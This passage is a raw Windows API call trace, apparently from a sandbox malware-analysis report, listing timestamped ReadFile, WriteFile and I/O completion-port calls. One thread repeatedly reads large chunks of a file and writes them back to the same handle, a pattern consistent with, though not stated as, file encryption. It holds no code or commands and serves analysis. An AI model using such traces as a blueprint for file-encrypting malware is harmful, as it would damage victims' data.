lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.007] WriteFile (in: hFile=0x610, lpBuffer=0x4820124*, nNumberOfBytesToWrite=0x9d31, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4820020) returned 1 [0156.030] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.030] WriteFile (in: hFile=0x368, lpBuffer=0x4b80124*, nNumberOfBytesToWrite=0x17f3f, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4b80020) returned 1 [0156.039] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0156.040] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0156.040] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0156.040] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0156.041] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 0 [0156.041] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0156.041] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.041] ReadFile (in: hFile=0x368, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4b80020) returned 0x0 [0156.041] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.041] ReadFile (in: hFile=0x668, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x41eff48, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124, lpNumberOfBytesRead=0x41eff48*=0x0, lpOverlapped=0x4ca0020) returned 0x0 [0156.041] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.041] WriteFile (in: hFile=0x670, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4280020) returned 1 [0156.045] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.045] WriteFile (in: hFile=0x618, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4940020) returned 1 [0156.071] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.075] CloseHandle (hObject=0x134) returned 1 [0156.086] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0156.086] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.086] WriteFile (in: hFile=0x668, lpBuffer=0x4ca0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0094*, lpNumberOfBytesWritten=0x41eff48, lpOverlapped=0x4ca0020) returned 1 [0156.094] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.095] CloseHandle (hObject=0x368) returned 1 [0156.115] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4b80020) returned 1 [0156.115] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 [0156.115] CloseHandle (hObject=0x630) returned 1 [0156.118] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4dc0020) returned 1 [0156.119] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x41eff48, lpCompletionKey=0x41eff44, lpOverlapped=0x41eff4c) returned 1 Thread: id = 130 os_tid = 0x130 [0136.132] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.437] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.449] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.452] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.463] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.463] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.571] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.572] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.574] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.574] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.583] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.584] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.586] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.586] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.586] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.588] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.591] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.591] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.688] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.689] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.691] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.691] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.796] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.797] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.799] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.799] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.807] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.809] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.810] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.811] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.811] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.813] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.814] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.814] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.822] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.824] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.826] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.826] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0136.949] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.951] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0136.953] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0136.953] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.001] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.002] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.004] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.004] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.004] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.006] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.007] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.007] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.225] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.227] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.228] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.229] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.229] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.231] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.233] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.233] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.255] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.257] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.259] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.259] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.259] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.261] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.262] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.262] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0137.321] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0137.322] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0137.324] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, 